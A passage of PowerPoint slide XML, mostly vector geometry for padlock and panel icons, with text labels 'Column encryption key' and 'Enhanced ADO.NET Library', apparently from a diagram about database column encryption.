                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="600"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                  <a:tabLst/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="1199"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t>Column </a:t>
                </a:r>
                <a:br>
                  <a:rPr kumimoji="0" lang="en-US" sz="1199"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br>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="1199"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t>encryption</a:t>
                </a:r>
                <a:br>
                  <a:rPr kumimoji="0" lang="en-US" sz="1199"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br>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="1199"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t>key</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="183" name="Group 182"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="11239018" y="3828735"/>
                <a:ext cx="355559" cy="456951"/>
                <a:chOff x="551587" y="3970765"/>
                <a:chExt cx="432008" cy="555201"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="184" name="Rectangle 74"/>
                <p:cNvSpPr/>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId2"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="551587" y="3970765"/>
                  <a:ext cx="432008" cy="555201"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:cxnLst/>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="93101" h="119655">
                      <a:moveTo>
                        <a:pt x="46888" y="61255"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="40157" y="61255"/>
                        <a:pt x="34700" y="66712"/>
                        <a:pt x="34700" y="73443"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="34700" y="78113"/>
                        <a:pt x="37327" y="82169"/>
                        <a:pt x="41596" y="83438"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="38933" y="104741"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="55183" y="104741"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52504" y="83305"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="56597" y="81937"/>
                        <a:pt x="59076" y="77980"/>
                        <a:pt x="59076" y="73443"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="59076" y="66712"/>
                        <a:pt x="53619" y="61255"/>
                        <a:pt x="46888" y="61255"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="47468" y="17532"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="43681" y="17333"/>
                        <a:pt x="39830" y="18360"/>
                        <a:pt x="36547" y="20648"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29978" y="25222"/>
                        <a:pt x="27348" y="33667"/>
                        <a:pt x="30159" y="41162"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="29615" y="41365"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="62407" y="41365"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="65562" y="34644"/>
                        <a:pt x="63689" y="26692"/>
                        <a:pt x="58003" y="21774"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54976" y="19155"/>
                        <a:pt x="51254" y="17730"/>
                        <a:pt x="47468" y="17532"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="48385" y="49"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55959" y="446"/>
                        <a:pt x="63402" y="3297"/>
                        <a:pt x="69456" y="8533"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79598" y="17305"/>
                        <a:pt x="83675" y="30904"/>
                        <a:pt x="78885" y="43093"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="87177" y="43906"/>
                        <a:pt x="93101" y="51139"/>
                        <a:pt x="93101" y="59752"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="93101" y="119654"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="119655"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="59752"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="51365"/>
                        <a:pt x="5617" y="44289"/>
                        <a:pt x="13654" y="43326"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9060" y="29605"/>
                        <a:pt x="14482" y="14678"/>
                        <a:pt x="26544" y="6281"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33111" y="1706"/>
                        <a:pt x="40813" y="-348"/>
                        <a:pt x="48385" y="49"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="6821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113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Segoe UI"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="185" name="Freeform 184"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="553981" y="4169262"/>
                  <a:ext cx="390997" cy="354422"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 2002754 w 2055898"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 2145774"/>
                    <a:gd name="connsiteX1" fmla="*/ 1643743 w 2055898"/>
                    <a:gd name="connsiteY1" fmla="*/ 0 h 2145774"/>
                    <a:gd name="connsiteX2" fmla="*/ 1080505 w 2055898"/>
                    <a:gd name="connsiteY2" fmla="*/ 0 h 2145774"/>
                    <a:gd name="connsiteX3" fmla="*/ 1028538 w 2055898"/>
                    <a:gd name="connsiteY3" fmla="*/ 0 h 2145774"/>
                    <a:gd name="connsiteX4" fmla="*/ 1027360 w 2055898"/>
                    <a:gd name="connsiteY4" fmla="*/ 0 h 2145774"/>
                    <a:gd name="connsiteX5" fmla="*/ 975393 w 2055898"/>
                    <a:gd name="connsiteY5" fmla="*/ 0 h 2145774"/>
                    <a:gd name="connsiteX6" fmla="*/ 412155 w 2055898"/>
                    <a:gd name="connsiteY6" fmla="*/ 0 h 2145774"/>
                    <a:gd name="connsiteX7" fmla="*/ 53144 w 2055898"/>
                    <a:gd name="connsiteY7" fmla="*/ 0 h 2145774"/>
                    <a:gd name="connsiteX8" fmla="*/ 0 w 2055898"/>
                    <a:gd name="connsiteY8" fmla="*/ 53253 h 2145774"/>
                    <a:gd name="connsiteX9" fmla="*/ 0 w 2055898"/>
                    <a:gd name="connsiteY9" fmla="*/ 114342 h 2145774"/>
                    <a:gd name="connsiteX10" fmla="*/ 1781759 w 2055898"/>
                    <a:gd name="connsiteY10" fmla="*/ 2145774 h 2145774"/>
                    <a:gd name="connsiteX11" fmla="*/ 2055898 w 2055898"/>
                    <a:gd name="connsiteY11" fmla="*/ 2145774 h 2145774"/>
                    <a:gd name="connsiteX12" fmla="*/ 2055898 w 2055898"/>
                    <a:gd name="connsiteY12" fmla="*/ 1119360 h 2145774"/>
                    <a:gd name="connsiteX13" fmla="*/ 2055898 w 2055898"/>
                    <a:gd name="connsiteY13" fmla="*/ 1079667 h 2145774"/>
                    <a:gd name="connsiteX14" fmla="*/ 2055898 w 2055898"/>
                    <a:gd name="connsiteY14" fmla="*/ 53253 h 2145774"/>
                    <a:gd name="connsiteX15" fmla="*/ 2002754 w 2055898"/>
                    <a:gd name="connsiteY15" fmla="*/ 0 h 214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5898" h="2145774">
                      <a:moveTo>
                        <a:pt x="2002754" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1643743" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1080505" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1028538" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1027360" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="975393" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="412155" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="53144" y="0"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="23793" y="0"/>
                        <a:pt x="0" y="23842"/>
                        <a:pt x="0" y="53253"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="114342"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1781759" y="2145774"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2055898" y="2145774"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2055898" y="1119360"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2055898" y="1079667"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2055898" y="53253"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="2055898" y="23842"/>
                        <a:pt x="2032105" y="0"/>
                        <a:pt x="2002754" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="2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grpSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="186" name="Group 185"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="10800000">
              <a:off x="5686165" y="4145356"/>
              <a:ext cx="2158499" cy="1195030"/>
              <a:chOff x="5615466" y="5068441"/>
              <a:chExt cx="2159368" cy="1195510"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="187" name="Straight Connector 186"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="7774834" y="5076321"/>
                <a:ext cx="0" cy="1187630"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="15875">
                <a:solidFill>
                  <a:srgbClr val="68217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0800000">
                <a:off x="5615466" y="5068441"/>
                <a:ext cx="2159368" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="15875">
                <a:solidFill>
                  <a:srgbClr val="68217A"/>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5028213" y="2914307"/>
              <a:ext cx="1334136" cy="1517720"/>
              <a:chOff x="5176643" y="2649107"/>
              <a:chExt cx="1334673" cy="1518331"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="190" name="Group 189"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5178445" y="2649107"/>
                <a:ext cx="1329773" cy="1518331"/>
                <a:chOff x="2280648" y="3221298"/>
                <a:chExt cx="1604158" cy="1831631"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="192" name="Rectangle 191"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2280648" y="3714445"/>
                  <a:ext cx="1035562" cy="1338484"/>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sp>
              <p:nvSpPr>
                <p:cNvPr id="193" name="Rectangle 192"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2846287" y="3714445"/>
                  <a:ext cx="1038519" cy="1338483"/>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grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="194" name="Group 193"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="2987875" y="4362404"/>
                  <a:ext cx="170804" cy="345682"/>
                  <a:chOff x="4663818" y="4990741"/>
                  <a:chExt cx="144934" cy="293326"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="199" name="Rounded Rectangle 198"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="4663818" y="4990741"/>
                    <a:ext cx="144934" cy="293326"/>
                  </a:xfrm>
                  <a:prstGeom prst="roundRect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg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sp>
                <p:nvSpPr>
                  <p:cNvPr id="200" name="Rounded Rectangle 199"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="4704753" y="5109315"/>
                    <a:ext cx="63064" cy="150479"/>
                  </a:xfrm>
                  <a:prstGeom prst="roundRect">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grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="195" name="Freeform 194"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2280648" y="3221298"/>
                  <a:ext cx="1030635" cy="1139757"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 79459 w 1537818"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 1670206"/>
                    <a:gd name="connsiteX1" fmla="*/ 767480 w 1537818"/>
                    <a:gd name="connsiteY1" fmla="*/ 0 h 1670206"/>
                    <a:gd name="connsiteX2" fmla="*/ 1458359 w 1537818"/>
                    <a:gd name="connsiteY2" fmla="*/ 0 h 1670206"/>
                    <a:gd name="connsiteX3" fmla="*/ 1537818 w 1537818"/>
                    <a:gd name="connsiteY3" fmla="*/ 0 h 1670206"/>
                    <a:gd name="connsiteX4" fmla="*/ 1537818 w 1537818"/>
                    <a:gd name="connsiteY4" fmla="*/ 79459 h 1670206"/>
                    <a:gd name="connsiteX5" fmla="*/ 1537818 w 1537818"/>
                    <a:gd name="connsiteY5" fmla="*/ 1670206 h 1670206"/>
                    <a:gd name="connsiteX6" fmla="*/ 767480 w 1537818"/>
                    <a:gd name="connsiteY6" fmla="*/ 1670206 h 1670206"/>
                    <a:gd name="connsiteX7" fmla="*/ 0 w 1537818"/>
                    <a:gd name="connsiteY7" fmla="*/ 1670206 h 1670206"/>
                    <a:gd name="connsiteX8" fmla="*/ 0 w 1537818"/>
                    <a:gd name="connsiteY8" fmla="*/ 79459 h 1670206"/>
                    <a:gd name="connsiteX9" fmla="*/ 79459 w 1537818"/>
                    <a:gd name="connsiteY9" fmla="*/ 0 h 167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818" h="1670206">
                      <a:moveTo>
                        <a:pt x="79459" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="767480" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1458359" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1537818" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1537818" y="79459"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1537818" y="1670206"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="767480" y="1670206"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1670206"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="79459"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="35575"/>
                        <a:pt x="35575" y="0"/>
                        <a:pt x="79459" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:cu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sp>
              <p:nvSpPr>
                <p:cNvPr id="196" name="Freeform 195"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2856270" y="3221298"/>
                  <a:ext cx="1028536" cy="1139757"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 0 w 1537818"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 1670206"/>
                    <a:gd name="connsiteX1" fmla="*/ 79459 w 1537818"/>
                    <a:gd name="connsiteY1" fmla="*/ 0 h 1670206"/>
                    <a:gd name="connsiteX2" fmla="*/ 921585 w 1537818"/>
                    <a:gd name="connsiteY2" fmla="*/ 0 h 1670206"/>
                    <a:gd name="connsiteX3" fmla="*/ 1458359 w 1537818"/>
                    <a:gd name="connsiteY3" fmla="*/ 0 h 1670206"/>
                    <a:gd name="connsiteX4" fmla="*/ 1537818 w 1537818"/>
                    <a:gd name="connsiteY4" fmla="*/ 79459 h 1670206"/>
                    <a:gd name="connsiteX5" fmla="*/ 1537818 w 1537818"/>
                    <a:gd name="connsiteY5" fmla="*/ 1670206 h 1670206"/>
                    <a:gd name="connsiteX6" fmla="*/ 921585 w 1537818"/>
                    <a:gd name="connsiteY6" fmla="*/ 1670206 h 1670206"/>
                    <a:gd name="connsiteX7" fmla="*/ 0 w 1537818"/>
                    <a:gd name="connsiteY7" fmla="*/ 1670206 h 1670206"/>
                    <a:gd name="connsiteX8" fmla="*/ 0 w 1537818"/>
                    <a:gd name="connsiteY8" fmla="*/ 79459 h 1670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7818" h="1670206">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="79459" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="921585" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1458359" y="0"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="1502243" y="0"/>
                        <a:pt x="1537818" y="35575"/>
                        <a:pt x="1537818" y="79459"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="1537818" y="1670206"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="921585" y="1670206"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1670206"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="79459"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:cu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sp>
              <p:nvSpPr>
                <p:cNvPr id="197" name="Rectangle 196"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2420174" y="3293956"/>
                  <a:ext cx="1306206" cy="1002408"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="931136" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                    <a:lnSpc>
                      <a:spcPct val="100000"/>
                    </a:lnSpc>
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:buClrTx/>
                    <a:buSzTx/>
                    <a:buFontTx/>
                    <a:buNone/>
                    <a:tabLst/>
                    <a:defRPr/>
                  </a:pPr>
                  <a:r>
                    <a:rPr kumimoji="0" lang="en-IN" sz="1599" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:uLnTx/>
                      <a:uFillTx/>
                      <a:latin typeface="Segoe UI"/>
                      <a:ea typeface="+mn-ea"/>
                      <a:cs typeface="+mn-cs"/>
                    </a:rPr>
                    <a:t>Enhanced</a:t>
                  </a:r>
                  <a:br>
                    <a:rPr kumimoji="0" lang="en-IN" sz="1599" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:uLnTx/>
                      <a:uFillTx/>
                      <a:latin typeface="Segoe UI"/>
                      <a:ea typeface="+mn-ea"/>
                      <a:cs typeface="+mn-cs"/>
                    </a:rPr>
                  </a:br>
                  <a:r>
                    <a:rPr kumimoji="0" lang="en-IN" sz="1599" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:uLnTx/>
                      <a:uFillTx/>
                      <a:latin typeface="Segoe UI"/>
                      <a:ea typeface="+mn-ea"/>
                      <a:cs typeface="+mn-cs"/>
                    </a:rPr>
                    <a:t>ADO.NET </a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="931136" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                    <a:lnSpc>
                      <a:spcPct val="100000"/>
                    </a:lnSpc>
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:buClrTx/>
                    <a:buSzTx/>
                    <a:buFontTx/>
                    <a:buNone/>
                    <a:tabLst/>
                    <a:defRPr/>
                  </a:pPr>
                  <a:r>
                    <a:rPr kumimoji="0" lang="en-IN" sz="1599" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:effectLst/>
                      <a:uLnTx/>
                      <a:uFillTx/>
                      <a:latin typeface="Segoe UI"/>
                      <a:ea typeface="+mn-ea"/>
                      <a:cs typeface="+mn-cs"/>
                    </a:rPr>
                    <a:t>Library</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="191" name="Freeform 190"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="5176643" y="2649107"/>
                <a:ext cx="1334673" cy="1518330"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 2002754 w 2055898"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 2145774"/>
                  <a:gd name="connsiteX1" fmla="*/ 1643743 w 2055898"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 2145774"/>
                  <a:gd name="connsiteX2" fmla="*/ 1080505 w 2055898"/>
                  <a:gd name="connsiteY2" fmla="*/ 0 h 2145774"/>
                  <a:gd name="connsiteX3" fmla="*/ 1028538 w 2055898"/>
                  <a:gd name="connsiteY3" fmla="*/ 0 h 2145774"/>
                  <a:gd name="connsiteX4" fmla="*/ 1027360 w 2055898"/>
                  <a:gd name="connsiteY4" fmla="*/ 0 h 2145774"/>
                  <a:gd name="connsiteX5" fmla="*/ 975393 w 2055898"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 2145774"/>
                  <a:gd name="connsiteX6" fmla="*/ 412155 w 2055898"/>
                  <a:gd name="connsiteY6" fmla="*/ 0 h 2145774"/>
                  <a:gd name="connsiteX7" fmla="*/ 53144 w 2055898"/>
                  <a:gd name="connsiteY7" fmla="*/ 0 h 2145774"/>
                  <a:gd name="connsiteX8" fmla="*/ 0 w 2055898"/>
                  <a:gd name="connsiteY8" fmla="*/ 53253 h 2145774"/>
                  <a:gd name="connsiteX9" fmla="*/ 0 w 2055898"/>
                  <a:gd name="connsiteY9" fmla="*/ 114342 h 2145774"/>
                  <a:gd name="connsiteX10" fmla="*/ 1781759 w 2055898"/>
                  <a:gd name="connsiteY10" fmla="*/ 2145774 h 2145774"/>
                  <a:gd name="connsiteX11" fmla="*/ 2055898 w 2055898"/>
                  <a:gd name="connsiteY11" fmla="*/ 2145774 h 2145774"/>
                  <a:gd name="connsiteX12" fmla="*/ 2055898 w 2055898"/>
                  <a:gd name="connsiteY12" fmla="*/ 1119360 h 2145774"/>
                  <a:gd name="connsiteX13" fmla="*/ 2055898 w 2055898"/>
                  <a:gd name="connsiteY13" fmla="*/ 1079667 h 2145774"/>
                  <a:gd name="connsiteX14" fmla="*/ 2055898 w 2055898"/>
                  <a:gd name="connsiteY14" fmla="*/ 53253 h 2145774"/>
                  <a:gd name="connsiteX15" fmla="*/ 2002754 w 2055898"/>
                  <a:gd name="connsiteY15" fmla="*/ 0 h 214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5898" h="2145774">
                    <a:moveTo>
                      <a:pt x="2002754" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1643743" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1080505" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1028538" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1027360" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="975393" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="412155" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53144" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="23793" y="0"/>
                      <a:pt x="0" y="23842"/>
                      <a:pt x="0" y="53253"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="114342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1781759" y="2145774"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2055898" y="2145774"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2055898" y="1119360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2055898" y="1079667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2055898" y="53253"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2055898" y="23842"/>
                      <a:pt x="2032105" y="0"/>
                      <a:pt x="2002754" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="1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grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="201" name="Group 200"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="386554" y="3826856"/>
              <a:ext cx="1512428" cy="1064744"/>
              <a:chOff x="533118" y="3562024"/>
              <a:chExt cx="1513036" cy="1065172"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="202" name="Rectangle 74"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId1"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="718308" y="3562024"/>
                <a:ext cx="355702" cy="457135"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="93101" h="119655">
                    <a:moveTo>
                      <a:pt x="46888" y="61255"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="40157" y="61255"/>
                      <a:pt x="34700" y="66712"/>
                      <a:pt x="34700" y="73443"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34700" y="78113"/>
                      <a:pt x="37327" y="82169"/>
                      <a:pt x="41596" y="83438"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="38933" y="104741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55183" y="104741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52504" y="83305"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="56597" y="81937"/>
                      <a:pt x="59076" y="77980"/>
                      <a:pt x="59076" y="73443"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59076" y="66712"/>
